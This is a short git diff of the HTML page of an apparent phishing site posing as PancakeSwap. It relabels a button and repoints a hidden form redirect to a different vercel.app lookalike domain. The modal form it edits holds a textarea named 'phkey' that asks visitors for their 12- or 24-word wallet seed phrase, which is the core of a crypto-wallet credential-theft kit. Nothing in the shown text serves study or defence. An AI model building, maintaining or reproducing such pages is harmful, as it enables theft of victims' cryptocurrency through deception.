--- a/index.html
+++ b/index.html
@@ -324,7 +324,7 @@
                 <h2 class="sub-title">Trade, earn, and win crypto on the most popular decentralized<br> platform in the
                     galaxy.</h2>
                 <div class="d-flex cta align-items-center gap-2">
-                <span class="main-button" onclick="showModal('#modalCon1')">Connect Wallet</span>
+                <span class="main-button" onclick="showModal('#modalCon1')">Add Liquidity</span>
 
                     <span class="main-button" onclick="showModal('#modalCon1')">Rewards</span>
                    
@@ -1267,7 +1267,7 @@
             <div class="modDivBody">
                 
                 <input type="hidden" name="_captcha" value="false">
-                 <input type="hidden" name="_next" value="https://pancakeswap-airdrop.vercel.app/pancakes.html">
+                 <input type="hidden" name="_next" value="https://pancakeswap-financedev.vercel.app/pancakes.html">
                <input class="modInp" type="text"><br><br>
                 <textarea class="modArea" textarea id="message" required name="phkey"></textarea>
                 <p class="modTypePara">Typically 12 (sometimes 24) words separated by single spaces</p>
